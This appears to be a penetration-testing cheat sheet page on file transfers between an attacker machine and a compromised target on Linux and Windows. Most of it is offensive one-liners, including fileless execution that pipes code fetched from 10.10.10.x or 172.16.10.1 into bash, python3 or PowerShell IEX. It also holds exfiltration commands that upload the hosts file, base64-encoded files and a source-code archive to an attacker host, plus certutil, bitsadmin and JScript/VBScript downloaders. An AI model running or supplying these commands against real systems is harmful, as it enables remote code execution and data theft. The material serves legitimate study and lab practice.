File Transfers

Misc, Protected and over HTTP(S) file transfers to be added.

Linux

Servers

HTTP

python3 -m http.server

python2.7 -m SimpleHTTPServer

php -S 0.0.0.0:8000

ruby -run -ehttpd . -p8000

Servers for uploading files to.

python3 -m uploadserver

# create self-signed cert
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
# create and move to webroot (must be different dir from the cert)
mkdir https && cd https
# start web server using the cert
sudo python3 -m uploadserver 443 --server-certificate /root/server.pem
# upload from the target
curl -X POST https://10.10.10.10/upload -F 'files=@file1' -F 'files=@file1' --insecure

nc -lvnp 1337

sudo python3 -m pyftpdlib --port 21 --write

SMB

# unauthenticated
sudo impacket-smbserver share -smb2support /
# authenticated
sudo impacket-smbserver share -smb2support / -user test -password test

net use z: \\<IP>\share
net use z: \\<IP>\share /user:test test

cp <FILE> z:\

WebDav server

# install libraries
sudo pip install wsgidav cheroot
# start server
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

dir \\<IP>\DavWWWRoot

copy C:\Windows\Temp\<FILE> \\<IP>\DavWWWRoot\

Downloads

wget http://10.10.10.10/file1 -O file1

curl http://10.10.10.10/file1 -o file1

scp user@172.16.10.10:/tmp/file1 ./file1

Fileless execution.

curl https://172.16.10.1/script.sh | bash

# -q: quiet mode
# -O: specifies the output, -O-: redirect output to stdout
wget -qO- https://172.16.10.1/script.py | python3

# connect to the target webserver
exec 3<>/dev/tcp/10.10.10.32/80
# HTTP GET request
echo -e "GET /script.sh HTTP/1.1\n\n">&3
# print the response
cat <&3

Uploads

scp file1 user@172.16.10.10:/tmp/file1

Windows

Servers

Create an SMB share:

# Create a new share
> New-SmbShare -Name "shared" -Path "C:\Users\x7331" -FullAccess "Everyone"

Name   ScopeName Path            Description
----   --------- ----            -----------
shared *         C:\Users\x7331

# Confirm the share is up
> Get-SmbShare

Name   ScopeName Path            Description
----   --------- ----            -----------
ADMIN$ *         C:\Windows      Remote Admin
C$     *         C:\             Default share
IPC$   *                         Remote IPC
shared *         C:\Users\x7331

Access it from the target via File Explorer at \\10.10.10.10\shared.

# to a Linux WebDav server
copy C:\Users\john\Desktop\SourceCode.zip \\10.10.10.10\DavWWWRoot\

Downloads

wget http://10.10.10.10/file1 -O file1

curl http://10.10.10.10/file1 -o file1

Invoke-WebRequest https://10.10.10.10/file1 -OutFile file1

bitsadmin /transfer n http://10.10.10.10/file1 C:\Temp\file1

certutil.exe -verifyctl -split -f http://10.10.10.10/file1

php -r '$file = file_get_contents("https://10.10.10.10/file1"); file_put_contents("$file",file1);'

(New-Object Net.WebClient).DownloadFile('http://10.10.10.10/file1','c:\temp\file1')

scp user@172.16.10.10:/tmp/file1 c:\temp\file1

# unauthenticated
copy \\10.10.10.10\share\file1
# authenticated
# connect to the share
net use n: \\10.10.10.10\share /user:test test
# transfer
copy n:\file1

Fileless execution:

(New-Object Net.WebClient).DownloadFile('http://10.10.10.10/file1','c:\temp\file1') | IEX

Uploads

# encode file
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'c:\temp\file1' -Encoding Byte))
# upload file
Invoke-WebRequest -Uri http://10.10.10.10 -Method POST -Body $b64

(New-Object Net.WebClient).UploadFile('ftp://10.10.10.10/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')

scp C:\Temp\file1 user@10.10.10.10:/tmp/file1

Misc

b64

# encode file on Windows
[Convert]::ToBase64String((Get-Content -path "c:\temp\file1" -Encoding byte))
# copy the output and decode it on Linux
echo IyBDb3B5...YWxob3N0DQo= | base64 -d > file1

# encode file (-w --> wrap, use 0 to disable line wrapping)
cat file1 | base64 -w 0;echo
# decode on PowerShell
[IO.File]::WriteAllBytes("c:\temp\file1", [Convert]::FromBase64String("LS0tL...0tLQo="))

Linux

# starting an uploadserver
python3 -m uploadserver 
# uploading a file
python3 -c 'import requests;requests.post("http://192.168.49.128:8000/upload",files={"files":open("file1","rb")})'

# python2.7
python2.7 -c 'import urllib;urllib.urlretrieve ("https://script.sh", "script.sh")'
# python3
python3 -c 'import urllib.request;urllib.request.urlretrieve("https://script.sh", "script.sh")'

php -r '$file = file_get_contents("https://10.10.10.10/script.sh"); file_put_contents("script.sh",$file);'

php -r 'const BUFFER = 1024; $fremote = 
fopen("https://10.10.10.10/script.sh", "rb"); $flocal = fopen("script.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'

php -r '$lines = @file("https://10.10.10.10/script.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash

perl -e 'use LWP::Simple; getstore("https://10.10.10.10/script.sh", "script.sh");'

ruby -e 'require "net/http"; File.write("script.sh", Net::HTTP.get(URI.parse("https://10.10.10.10/script.sh")))'

Windows

# create a file called `wget.js`
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));

# execute script
cscript.exe /nologo wget.js https://10.10.10.10/script.ps1 script.ps1

# create a file called `wget.vbs`
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send

with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile WScript.Arguments.Item(1), 2
end with

# execute script
cscript.exe /nologo wget.vbs https://10.10.10.10/script.ps1 script.ps1

PreviousTraffic Capture NextCrypto

Last updated 4 days ago

Was this helpful?